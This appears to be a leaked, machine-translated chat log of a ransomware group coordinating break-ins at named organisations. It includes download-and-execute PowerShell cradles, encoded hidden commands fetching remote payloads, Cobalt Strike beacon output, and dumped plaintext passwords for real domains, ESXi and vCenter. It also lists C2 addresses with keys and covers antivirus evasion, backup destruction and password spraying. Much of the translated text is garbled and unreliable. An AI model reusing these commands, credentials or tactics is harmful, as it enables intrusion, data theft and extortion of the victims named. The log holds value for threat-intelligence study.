B220F36F08A7E3B1965BBCA55CF7F09F1EF255AD630BAC1580000E3A
D222A320D342DB4BC833E2E4C257E52553197BD338DEFB57B236C9E6
192090C832A419E665B511163E0BAFAA90690232DDE95A5650F6A6B8
FD5C78FD5E49EC4879816F7441971213D2861AD7E20412C549CC8517
677D53552B83756A2F54BAEB38497F60E8D7EB60B9D7A19BFF495016
06FDDE848E2DA8B8A128BAB34C77FFF5AEA18D130C6C2818877EF059
FB0009A8DAFE7C03028C02DDDE72672BB4E09BFBD6F6B91AFF72C0E4
5203A12307CE38D4CFAAF48CC5B1D000E68C11BEA41766B207657EE1
5BF5115CAEE8B5F42AC242857F921DC68963365579AB5245A9A261D2
EB551E5E8FEA013839D1AA991483C2EF6FE3117974AAD6D6E6E358D4
A3AF20F6760C5AA13A6BAE5CA8DFA9E2941744D664212581A6206695
AC7D817F4F6A0114E5FC5CDF87BB5F3887C24DC31A71EBC0BF75C668
E6BC1F422AC0E38D06570948272E87E7D532BB690EE6F62287866ABE
D4B45B094F37AD2256A971BDE09F18628D8E700FE5FA66402B0F656B
03FFBCE97D66E7035A7704A341E05B78F627CA42BC06C0154B403388
9E7475B1B10D442A54F9F95E3AE67260DE4FAB6226B210FC0CA67DA8
785B42B01F1D84BAC9CA7860DFBAD717E7C91B6A2FF53CA7AFCDA035
3EA35435695B3A98C5069BCE59BB83F2CFEEB3AB2C8A094D3DAF595B
DC8D4E347736B6B635B2B73EA4F10655F3FA44FEE38B78B2F42BB2FC
E531C0C66634D142CDC6C4C806733AF8CC250DE2234C9D7258901857
49502387C090BE6CB3AACE649D3D9274A7EF3838E876DDAC9563A29B
8E41E0EB541FE0306E999AA669293B6EDE8CC708EBD73060F093490A
C226A3F55C79E2376EE53B1053544A20F977EBC9A9296276B52905BE
0B63371C951FFDF6A65D297EBBFF81902B8F2DA42675A36C45F11C22
B141782F7512AD8363C23BFF25E4EF91D69386F39E1F630795B3FFA5
C93758C3503AC41EE6F89ACA8A60A8F3F208DE85DD24825BEEF1C13B
17D17C6C33B73A2787BCE9D4A79CCFF3AACD9516EA2ECF88853555D6
62E46125B0CE00B2EDF5E0D24C18D5DADDA81973EB4ED03FAB5BD2B6
C9F9D06BD5CB5B97EABF2689AC617031E51035D7FC6D33417CCA79A5
BF405F8063EDFD057F63554133F5E507992D982CDA68B08BD7C6B923
31ACCEF2AE62F47BD978E62178C95D2791D458686E171F1B3DEF886A
CCC76ECE68757CFED83296882DE9819A7D0DC6460E6E797DEF03CCD8
137E0B7DAF02F42FE1C14B0C60E86048961D658AEAF2E6740887981C
193082C4457CEAB32102095245195C2F9848883CDE9AF1BEAC622FDC
7590C0E255935455514560BE4ABB64F073754891F3F6D646B3CC1FB7
F6307A48BA84B7B91944190C0D8BA963AB91ABF9F52EB5ECE6101FF7
9934DC488320CE690433C4661431B0134C0B05511D7BF19EBFA4AD92
BA15E3871E7F32D8177612D05A1FB6F9917629B21B13CC009A073259
88E2526171CF5ECE69974CCEEE9B2D63932F9A85A1974A90A840C91F
14AEFF37F45A82E5F1A66276B0220977F73B445DEB06F63F458A80BC
4CF09C2E372D15E0141AD31F0910FCE19C7DD5003EE475ACD92A6DCB
0383DE61A278
SamAccountName : aspsql2svc
DistinguishedName : CN=aspsql2svc,OU=Service Accounts,DC=mapciasp,DC=com
ServicePrincipalName : MSSQLSvc/ASPSQL2.mapciasp.com:1433
``)))pay attention yes yes without comparisons you can see and compare the payoffsvote both linksix ((New-Object System.Net.WebClient).DownloadString('https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'));``
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/darkoperator/Veil-PowerView/master/PowerView/functions/Invoke-ShareFinder.ps1'));
``This is the script from the git
https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/functions/Invoke-ShareFinder.ps1
As a consequence in the current session you write Invoke - something you've downloaded and bang it works[ ](https://mediaeveryone.com/group/mapciasp-com?msg=NvfCtE6foxs9WBEAY) here's the url of the script command above - just load it into memory without physic drop `` ``.
C:\projects\default\temp
BBCTX6 @ MAPCIASP\bbbwalkerj
EULA.ps1
The term 'EULA.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
00:00.0058
``Running scripts by filename? ExactlyNo one)``And who says it's issued once an hour?
powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0AawBKAGYAWAB0AHYATwBsAGIAdAA5AHIAVAAzAFYAWQBqAGUANwBBADQATQBxAHUAaABiAEcAOQByAGIAbgBjAHIAQQB4AHoARQAzAGMAdQAnACkAKQA7AA==
``You said you couldn't load the same load twice so restart the script in the current session for 40 minutes``.
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/'));
``Workingwithoutit``.
powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0AMwBrAGUANQBhAHgAWABFAGUAdQBLADkASQBtAFYAMQBCADMAYgBwAHcAQwBRAGoAYQBCAEMAYwBoAG8ARQBPAG8AdwBUAGEAWABHAGQAbwAnACkAKQA7AA==
``1 load 2 times you can't throw the load unique? check the session in tpshAnd you can't import it as a module eitherGood question, I don't know. But you can't use Invoke-Kerberoast.ps1 because ps1 is closed. So if there is no scripting on your machine and there are no modules in ps then how will it work if I import kerberos there?this is how tpsh takes the scripts load in itself.Did you try running the scripts close what scripts? any other ideas? there comes da@tl2 this https://wideio.com/USA/6LG8Ean3mNZcWV4Zk4E8A01XYmw2NOfxva5pgZVUWcjnAvyD60q45b991yG0/dashboard@tl1 have you tried pulling in tpsh ? i have access via ps and cmdkxxm
I can't believe avg and defender is so evil...even injecting it into a delta process won't work..Trying different loads, session will go to the armitage and then will fall off. No seftikatz, rubius or kerbiroz type stuff to load, tears it down right away. Run ps scripts locked. for me textmodify files for themselves net localgroup "Admin" ``.
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
MAPCIASP\Domain Admins
The command completed successfully.
``output with /dom``.
The request will be processed at a domain controller for domain mapciasp.com.
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
aspprinters
bbrooks
bkupagnt
Domain Admins
Enterprise Admins
ghouser
mkline
rmiller
sfoster
The command completed successfully.
``If I pull files from each conf 10-20 lines I will die in the number of files on the systemTo be able to search if necessary, and not fuck with the page loading in this chat.Why files about DA EA LA in ad_user 829 Objects go to 1000 users? in #general also wrote how to search historyThere is no, search for the drive file is not, check and if there your traces - clean up`` ``
History File Information. The default location for this file is $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt .
``Do you know that ps stores the history file on the system? On your own dedicec yes, it's connected via citrixts on the rdp?
Target : MS.Outlook:bwalkerjr@birniebus.com:PUT
Comment : USERNAME_TARGET_POINTER
UserName : bwalkerjr@birniebus.com
Password : @@CuAAAiBwdAEGAsBwaAUGAyBgaAIHAABgYAkGAyBgbAkGAlBgYAUHAzBgLAMGAvBQbAA
CredentialType : Generic
PersistenceType : Enterprise
LastWriteTime : 3/2/2020 8:58:29 AM
Target : mail.krapfbus.com
UserName : bwalkerjr@birniebus.com
Password :
CredentialType : DomainPassword
PersistenceType : Enterprise
LastWriteTime : 3/2/2020 8:58:29 AM
Target : bwalkerjr@birniebus.com
UserName : bwalkerjr@birniebus.com
Password :
CredentialType : DomainPassword
PersistenceType : Enterprise
LastWriteTime : 3/2/2020 8:58:29 AM
``Mb external domain birniebus.com where are they? Through cmd and psa how do you work there? Trying to get, seabelt and data on YES I know that @user9 has yes I asked how many with YES networks not up@user3 have you with YES network?[ ](https://mediaeveryone.com/channel/general?msg=idsBNFAZrjwCKbFNG) I said no doubt about it I can't say I have 1 YES real network 1 network.and tell me how many networks we got with YES which without a doubt are normal networksI'm working faster colleague I'm working 3 more people +++ no more new sessions so all worked out what was it?or not .... bullshit what's it going to be like labavo no login, it looks like there's no freebies there + mostly 7/hrs don't like it i don't@user9 ?no trusts you say ? do make a confrashash.com - make a confrash plzstateoilcompany.com - strange network
34 users, 66 computers, no trusts can i getstateoilcompany.com ?I'm not sure if I've got a new one, but I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one.com I'm still the only one who works with it? ballymoregroup.com confab check it out guys there is a session with a local admin zazl not touching it priorityes it but I took ballymoregroup so what to take, zazl or ballymoregroup? ballymoregroup take it to work
there's a big case
can be for two at a timeadinfo taken off still get a taxi? well, i did not believe it) ``
>mail: tyler@gaudyme.com
``Ah ouch''.
>userPrincipalName: destineeg@DressinGaudy.local
``I do not believe it``) in adinfo suchDressinGaudy.local more +3 sessions and configs too from that domain there are 3 cars
2 has a client, but configs on them do not see and they are now dead
on the last client does not sit sitbelt is silent? config and does not smell of it in bluegrays alive there is a computer without a client vpnapodlecu who took rtpcompany.com there is a second session you do not write in the comment your domain koba, there is written externalnikBK new bots 15pcs[ ](https://mediaeveryone.com/channel/general?msg=MgtwStYbXqTWFDJkj) do confuber work take whoever.com10 minbrbr newbots are in bkHowever sexy all off that you can kidajeet still sessionsfrom him on the tachka look for vpnno have bluegracegroup.comadinfo no as not visible domain[ ](https://mediaeveryone.com/channel/general?msg=oQMWyvPFBzY3xipch) hurriedly))com`brighthorizons.com` confi pleaseDo spav https://neteric.com not come[ ](https://mediaeveryone.com/channel/general?msg=FfcCPvXueqb75SfzY) you'll laugh, but in adinfo no external domain if you pick up then writekobel.com - confi already forgot how to do it? domainvneshneed to give confi TomHolzerFord.local[ ](https://mediaeveryone.com/channel/general?msg=ET5DAcd6gWFrqMsfh) take awaykobel.com take away here in the netcob and work[ ](https://mediaeveryone.com/channel/general?msg=Kw5w8z6gz9EsRLCTt) here sessionsAnd work with what? mine by the way, flew in, although before did not want to..they clean daona empty the rest in shit after closing the gridthere are only 2 no personal took away74.118.138.118
https://neteric.com
----------------------------------------------------------------------------------------
104.243.44.69:13574
Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7
pf,hfk``
74.118.138.118
https://neteric.com
----------------------------------------------------------------------------------------
104.243.44.69:13574
Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7
``````
104.237.4.48
https://valcp.com
----------------------------------------------------------------------------------------
199.127.61.214:33914
WLzR0eDj5HH5PGAwCkOn9Dv2byQT64cQ3GY
``Divide into groups by the way a couple of cubes workers are red, so where there was already spawn do not touch`` ``
199.127.61.123:15724
npUPwGS5AK1pPU6W6ZxmvzzkdhsqzqaRFWa
``Get the cobb up? oh, what a good time to fix it, you know you have to take it before they fall off if you already have a session in the cobb da fuck with this microtic, will soon be ready to do what?general alg you already know) Okay, but I want the map to reflect the nuances of the situaDa rdp came and raschal Well I can describe here is how it was today So there's a situation review later or how to be with non-attractable servers How to be on the server without charThere are now busy problem with the internet and here is the motive for the question just so you do not get mixed up in the algorithmto leave all if it helps youI am an artist I see so This is my vision a, even so the right algorithm on the left tips How to start Well, the beginning of this turn in a token can take the command outside the map true, to reduce the size you're still at hand bats and so dto leave it if you understand and 1 line is a turn in the token) the beginning of the map turn in a tokena little strange you got a ok if offsets av and stuff like that why? faster would be to scatter ephemera I think the same way from 100 mapping in both cases and if you have not found it, then only mapom if 100 then it is better to otkl av + win def and scatter ephemera if to 100 servers you can get along just the same only mapovoretically there is an important aspect of this?so will dozabyla forgot i do not see the division to 100 servers and from 100chem to change? report as a router will beroadmap, waiting for a routerpodobytesya what to do so i will add you a new tul `https://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion`
please send me your names from here.
23.19.227.54
https://urlbig.com
----------------------------------------------------------------------------------------
45.126.210.66:22514
cJZw4bgWNBuYAeLXToHzNLYZOqnTS8CJwIe
``Well, I don't remember the hostname and I can't get into the koba yet.``
now throw the kobu in the history of bicon no unions do not see ``
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
Unavailable G: \10.10.34.201\c$ Microsoft Windows Network
Unavailable H: \10.10.34.242\c$ Microsoft Windows Network
Unavailable I: \10.10.220.95\c$ Microsoft Windows Network
Unavailable J: \10.10.220.67\c$ Microsoft Windows Network
Unavailable K: \10.5.68.232\c$ Microsoft Windows Network
Unavailable L: \10.91.18.5\c$ Microsoft Windows Network
Unavailable M: \192.168.0.59\c$ Microsoft Windows Network
Unavailable N: \10.91.18.21\c$ Microsoft Windows Network
Unavailable O: \10.10.30.64\c$ Microsoft Windows Network
Unavailable P: \10.10.35.60\c$ Microsoft Windows Network
Unavailable Q: \10.10.34.222\c$ Microsoft Windows Network
Unavailable R: \10.10.39.180\c$ Microsoft Windows Network
Unavailable S: \192.168.254.156\c$ Microsoft Windows Network
Unavailable T: \10.91.18.76\c$ Microsoft Windows Network
Unavailable U: \192.168.0.86\c$ Microsoft Windows Network
Unavailable V: \10.10.72.247\c$ Microsoft Windows Network
Unavailable W: \10.10.35.101\c$ Microsoft Windows Network
Unavailable X: \10.10.35.85\c$ Microsoft Windows Network
Unavailable Y: \10.10.73.9\c$ Microsoft Windows Network
Unavailable Z: \10.10.72.139\c$ Microsoft Windows Network
The command completed successfully.
´you gave the cob above I thought it was she and isto me to compare it nowhere else exactly where you mapped to dumping) ah, so you need to throw the coba, so immediately would have said)) and check whether the maps remained after I wanted to see the place where you pamiely before dumping.she and I was interested)in the coba no net or no in the coba?
because I may have it in the one that fell off mapiltekonnect only in myteb no at allTESTCONNECT.lrhc.losal or here do not remember exactly, but here like mapil
TESTWEB.lrhc.losal to check if they are still there I am interested in the host where you mapped from the list
```
10.91.19.195
10.10.31.42
10.10.39.148
10.10.35.118
10.10.220.202
10.10.35.19
10.10.80.102
10.10.220.88
10.10.222.38
10.91.18.34
10.10.34.187
10.10.34.183
10.10.30.154
10.5.68.126
10.10.222.61
10.91.18.94
10.5.68.241
10.10.221.21
10.10.220.59
10.5.65.51
10.10.220.41
10.10.221.17
10.10.35.137
10.10.73.6
10.5.67.49
i want to check if there are any mapps left before the cipher started, then i went to another cipher and told him that the first koba fell off and there mamapilosya not kobamapi in question because the vpn fell off and did not have time to check this is it?
23.106.215.165
https://palside.com
----------------------------------------------------------------------------------------
199.127.60.23:57230
b5b9BPVoH7jnJt2OEQlUbLxxjvXOvoKa4Ue
``now there are no cob connected to the hostname where mapped before the collapse did not have time to check the case when the cob fell off? to the question of this ``arms: 791/1040 mapped, the cipher in question `` with a possible extension to 12 by the time until 10 we have until what time today? in order for you to estimate this time when closing large volumes of data and general info: cipher speed ~20-40 minutes to 1tbokay+ all understand?yes, understood? there is 1 main domain and several secondary domains and you estimate these links as default between all domains you forget to analyze the bundles of domains from small comments look at his circle of users by group and see more tróós poznachennyh people in the network, also important to watch and there were interesting files on the computer and among them already found chrome
login: root
pass: -you then discounted a memberof one Dan would have been longer if you had not given a tipI thought I would have to spend my last day off to work) for Saturday solved the problem with the spheremodelshafto immediately I want to mention such moments as reseche network on that probably all and put off the network after all servers have pulled in already will not work that will extend your online lifetime for an hour or more just times less you will still noise whether or not it and immediately this question if you have + + idea is understood?the main thing is that the server is unreachable, the calls of employees are unavailable, everything is slow, the network is frozen, another conversation it's like, until you log on and go to the snaps section, if admins are so pedantic that they go to check snaps every 10 minutes or they might not get it?I understand that it's a scare on the net, but when we've already shredded the avs, lost snaps, does it make sense to hide?or will not notice that the network freesitka how long the admins will not take a head360k requests per hour500 requests every 5 seconds excluding your internal (a la mapping and vmik to open)100 servers in the network and while you work with them 1 hourk how it works on the numbers just so you understand that the client dropout is not simple ping it quite a full-fledged request in the slip because inject should be done almost simultaneouslyeven if you worked in a command and while I was pulling the other mappings to the servers are already drawn and while pulling more additional servers, the old flurry you pull N servers at intervals of 5 seconds such a remark to us still have comments on the grid, other than the server stall?))mapper228+)))mapper? without lukashenko228 only adequateyou have the ability to choose a name for the alias, not critical it will be without graphics as I do not think it is necessary in this case if you want such a format - yes there can be a cna script, which is given a list of ip, separated by comma, and it matches these ircons in a specified session this optimizes the time spent on the stage map arms result of processing you know and each server copy line by line ` `)
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
``Do yourself a blueprint of this command and you will see where you want it to go (text editor), and it will work like this:
``execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full` + now will be in development Marregvash task to make this map taking into account such small things as "the server does not open what to do "even just to 100 and from 100ya want you to get away 2 main outcomes: up to 100-150 servers and above and while you do not have internet you will take up writing roadmap for the process of running the build2 item my fault3) or you are nervous or something, but you forget too basic things2) our process in such cases is terrible1) I want to thank you for the process, the network was hard and unaccustomed, but you did it judging by the statistics and you need time to work the build itself you have 2 hours at most and speed up please for what) in the future I will know, thank you alwaysDOMENCHts not specified in the hostnameask a comrade easier) you have 5 people around what exactly is not configured as follows ?help him helpcolleague still does not know how to configure a sheet for coba go to the confab+@tl1 all here hello4 min max I just a little bit and all will soon be when? soon all will soon all not yet in place? good morning nets still scanmedr, backups, in centers, etc. all ready? here's more what found)`We also copy them to WORM tape daily, with indefinite retention. The tapes are kept in a fireproof safe at the NOC.What tape?only remote-exec returns nothing like remote-exec psexec ADM-NAS ping google.com -n 1 can you check if the remote computer is connected to the internet?he kind of need to order beforehand, I mean the crap that encrypts files)) assemble the dll? what is it, by the way, with the cryptor? + looks for non-domain ports subnetwork what ports and why? scan portsport servers, scan user subnetsuser7 Well, yes, get a colleague to help and 410 subnetwork where users sit :flushed:It seems that the delay - yesterday 60 something servers were pinged, and today over 200. I need to re-sort as usualDo you want to make a new raw? I haven't noticed, I'll do it now if you haven't noticed when you build a .bin file its hash is always differentDo you just give me a new raw what kind of shellcode is it? i can't pull anything from the lab yesterday because i can't pull anything from the test lab because dllvmi is off, psec works, but the session doesn't come specially i'm not pulling, i just jumped from user's car to dk and had to try and find where it'll let me go..and why do you pull? no, just not all can pull, in particular PDK can not you pull all the servers in the coba or what to do with servers that do not come with the session? add me to his computer froze, now reboot ... who in the group to give?
Domain = cn.net.ntes
In adusers mail = mesg.corp.netease.com
``A couple more+you'll have sessions? \you have a name for the conf+? @user3 give kobu nearer to 2 will kobu be ready da@tl1 New sessions will be there? what progress? by 10 will be new sessions as a variant it is possible to get on dk through rdp for example if it is allowed it not da)is there any kredes?:thinking:? then this user can jump to dk if there dk is a dk they say the french mikat
Authentication Id : 0 ; 63768393 (00000000:03cd0749)
Session : Interactive from 0
User Name : nddevbernst
Domain : JDOSSN
Logon Server : JDODC64
Logon Time : 10/23/2020 2:15:49 PM
SID : S-1-5-21-3450394983-289173729-1299264434-241049
``in the output mimic or in the ad info? is that where the user went? logon sever in the output mimicwill ask in an hour still in questionnew by how much to expect? old are theresessions working?good afternoonfaeray admin is likely to be the main technician(s) make sense to pull other machines? the current machine (dk) have already searched up and down for files related to FireEye and have already read all the counter .xml and .txtladno it is the practice of saving on the number of agents in general
EDR very often are not installed on workstations, but they are on the serverh Then I saw the assumption was based on the fact that I did not see the process of FireEyeexplain please I do not understand the logic of the assumption based on the check of the users machines? I assumed so, and you say there is no it and look admin on DK and the two servers I wrote above exactly and it runs in FierEye process is called
xagt.ehem
[+] Determining what EDR products are installed on USHDC1-CSPADS02...
[+] host called home, sent: 63 bytes
[+] FeKern.sys Found
[+] 1 EDR Products Found!
======================
| Vendor Information |
----------------------
[+] FireEye Found!
``dalf? Is that what it is
https://github.com/harleyQu1nn/AggressorScripts/blob/master/EDR.cnaEDR_Query shows on the firewall at that? there are 135 computers and all the servers? no firewall agent either? in the ad_users search:
tech, it, network, etc.
SharpSniper showed where two of them go, FireEye is not running thereEDR as I understand it is missing, based on:
https://www.anti-malware.ru/security/endpoint-detection-and-response
FireEye, as I understand it, either knocked out or not usedokjr only win defenders checked - not if in the process on the servers does not hang, so it is oldI guess it is either disabled now, or old and no one removes itFireEye is AV, right? a, the directory is[ ](https://mediaeveryone.com/group/saiglobal-com?msg=vcDBBToC2L6hZJp3) but there is no process, no directory from it, AB can not identify sitbeltwas still installed FireEyesitbelt did not withdrawAB as I understand only win win defenders will be in kobezaberikorocha closed like a shop, this user changed the pass and session hung up, can not get a new raise-change these guys YES passwords?so do not unnecessarily noisydskink throwing tom domain sootv already removed a couple of critical pkv tom domain already work, as you prepare, I will give you a session from 2 domainsvot yes from that domain) ` `.
overland.com\dynamics:bobc@t!
overland.com\Administrator:Vi3wSon!c
overland.com\mahesh.admin:Changeme!
overland.com\zerto:CR@CKer$
``To dk from the main working domaina to the domain how to pass)
CRCKer$``
Pinging AD1.overland.com [10.69.0.35] with 32 bytes of data:
Reply from 10.69.0.35: bytes=32 time=10ms TTL=127
Ping statistics for 10.69.0.35:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
beacon> portscan 10.69.0.35 445 none
[*] Tasked beacon to scan ports 445 on 10.69.0.35
[+] host called home, sent: 93285 bytes
[+] received output:
10.69.0.35:445
Scanner module is complete
``Nothing to remove here, it's a prod segmentetad, dxink and so on to remove themselves or is there? the main domain near you are in the trust prodovom, do not touch it immediately do not rushschellyn.comdomain kobydavay+may offer another network to work until the news? do not remember, I think I saw where something
i'll try the pass if you have it) do they have outlook clients? no, the pass does not fit, the ones i've tried
the rest before the weekend user8 tried, but i don't know what he had there2fa? in the mail access to the neta with the mail we have what? browsers directly from ALL computers, also nothing else check the files, so far nothing (checked sccy? eight? One quit[ ](https://mediaeveryone.com/channel/general?msg=nxpga4pHxRxHF6qxv) 4 in scythe all off, even in the center
ping goes nowhere, domain is not available may well lie useful dokuoksche pay attention to file servers in IT folders let's write back as you check it outcross-check the files, nothing left thereThere are no browsers on all the machines I think the chance is high enough5 people in a working day can find accesses?There's still no found the creeds from the nasovi then give out a couple of vpn, but there without direct accesses. will have to fuck then let's close the sccy then sccy- on belemor have creeps ?snu.edu deadlockedIt turns out that only sccy and snu.No new sessions will be available today? sccy seems to be a couple of sessions alive now checking skytech, there are a couple of sessions there-is there anything alive in `CORP.TELEVISA.COM.MX` ? what to work with today? where are you all already here? it's not like there's a lot of you hello hello
http://172.17.70.13 Banner: nginx
http://172.17.70.13 HQNAS3 - Synology RackStation
http://172.17.70.14 Banner: nginx
http://172.17.70.14 EVO HQ NAS
``````
http://172.17.70.16/certsrv/Default.asp
qlyons
applecherrypenguinski
``````
172.16.1.35:53
172.17.70.7:53
172.17.70.8:53
``cheech.evo.local
172.17.70.16 - ``here somewhere I checked the mail through cme, also no net with the current domain?
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\mherna02:Disney Land1',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\odomin:RaspberryPies made in 1911 is not good',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\sccmagent:un4seenconsequences_',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\tylerservice:Ty1er$erv1ce7845_',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\bross:!World domination2019!',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\ldelar:Lnd088034',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\munis:Mun1$5623!',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\mzuvan:Logitech45W',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\papercutservice:romeo25-',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\sccmsvc:0mnicrom-',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\mandl:ententeich,',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\pgalde:$uper_0lb@P!!!',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\sccmadmin:juliet25-',
``most likely it will separate 1 space without a clue`` good question ``juicy cum`` or ``juicy cum`` will consider it as a password ``if there will be an example cum_login will define it as one whole password with a space`` I put it in quotes in the file simply domain is better not to write in a file I ask about that if there is a space in the password there without domain in any case ``you`ll be on LA
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
``and the domain is separately specified in the user:passuser pass module
that's the way it is))
there's just a space there, is it :CLEARTEXT:? just don't remember if it will or won't understand it? through the file most likely cleartexts yes
if you shove them in USERPASS_FILE in smb_login, will it understand quotes in passwords with spaces or will it think that the quotes are part of the password?
```
sisd.net\mherna02:CLEARTEXT:Disney Land1
sisd.net\odomin:CLEARTEXT:RaspberryPies made in 1911 is not good
admin.sisd.k12\sccmagent:CLEARTEXT:un4seenconsequences_
admin.sisd.k12\tylerservice:CLEARTEXT:Ty1er$erv1ce7845_
sisd.net\bross:CLEARTEXT:!World domination2019!
sisd.net\ldelar:CLEARTEXT:Lnd088034
admin.sisd.k12\munis:CLEARTEXT:Mun1$5623!
sisd.net\mzuvan:CLEARTEXT:Logitech45W
admin.sisd.k12\papercutservice:CLEARTEXT:romeo25-
admin.sisd.k12\sccmsvc:CLEARTEXT:0mnicrom-
sisd.net\andl:CLEARTEXT:ententeich,,
sisd.net\pgalde:CLEARTEXT:$uper_0lb@P!
admin.sisd.k12\sccmadmin:CLEARTEXT:juliet25-
``don't polucht only and brutt try the current admins as local there on dki adjacent polzaky not passed if there is no enterpricesucha look for access in the other domain so far datak, here all ready get it?in the name vcertnu then there is probably not. it has what signs? and in the center? a bunch of hypervisors found? then dvcertnu virtualization center or what is it? vcertnu in the center is what? in the center and stuff found?) well, put it out?) yes, also got it)
huh... i'll scrap the ports... work your way up the wpn.
the locker will get through cb - there's more proactive than auto blockingChecked all available armas everywhere cbChecked all servers with cb maybe they'll find a way to break into the network not sit long first thought he was without it, when i pulled the session saw that he was there found a server without cb?
* Username : veeam_vss
* Domain : EVO
* Password : rhR7m1T3ZnhB
wdigest :
* Username : tcooley
* Domain : EVO
* Password : SammySeveDog44
kerberos :
* Username : tcooley
* Domain : evo.local
* Password : SammySeveDog44
wdigest :
* Username : qlyons
* Domain : EVO
* Password : applecherrypenguinski
```
wait for builduser7 then we will close todaya, there is still a daughter YES in google with 2phmail in the softcloud the rest of the passes do not fit, the mail in general has access to the general manager, some operator and an empty mail is given to the mail is there info? well not a dump, maybe important files, planes build all the same judging by the name, perhaps there filewash look
We found everything but the access to one nasa.
there are two disks, one (Mechanic_Library) is not accessible
this one is nowhere to be seen in the files / browsers
coba in lsnado will be a new coba
today no pulls ok, a couple of hortbits and die
SI-SCIP01: 10.0.2.120
SKY-SQL: 10.0.2.129
SKY-BEUZA-01: 10.0.2.20
SKY-DC02: 10.0.2.11
SKY-CRM: 10.0.2.10
DMW-PRINT-PC: 10.0.6.75
SKY-BEDMW-01: 10.0.6.13
SKY-DC04: 10.0.6.27
MTN-PLAYER-PC: 10.0.1.180
``````
MTN-PLAYER-PC
SKY-MGT
SKY-BAL
SKY-TS01
SKY-TS01
SKYDC-RH
SKY-DCPS
UZA-DERRICKW-PC
UZA-DERRICKW-PC
DMW-MANDYF-SURF
DMW-FRONTDESK2
DMW-CHUCKM1-PC
DMW-CHUCKM1-PC
``hdavail.comhello everybody hello everybodyuser4user8 This one we don't have access to, the others do
```
Shared resources at \10.0.6.83
LS520Dc5f server
Share name Type Used as Comment
-------------------------------------------------------------------------------
Mechanic_Library Disk Mechanic Library
Public Disk
The command completed successfully.
On these servers, you have to check the vim console to see if there is a link to the cloud
```
SKY-BEDMW-01.skytech1.local - VEEAM BACKUP SERVERS
sky-beuza-01.skytech1.local
``````
https://10.0.2.32/ui/#/login ESXi' root\$uperm@n
``````
Website: https://sky-vcenter65.skytech1.local
Username: 'administrator@vsphere.local'
Password: 'Superm@n2018'
``````
10.0.6.54:445 (platform: 500 version: 6.1 name: SKYNASJEN domain: WORKGROUP) NAS admin/password FS visible from YES
10.0.6.83:445 (platform: 500 version: 4.9 name: LS520DC5F domain: WORKGROUP) nas
10.0.6.153:445 (platform: 500 version: 4.9 name: SKYNASDMW domain: SKYTECH1) nas
10.0.2.127:445 (platform: 500 version: 6.1 name: SKYNASSC domain: VOLUME) nas
``If I understood correctly some kind of admin from what ``
http://10.0.6.243/web/guest/en/websys/webArch/mainFrame.cgi
``````
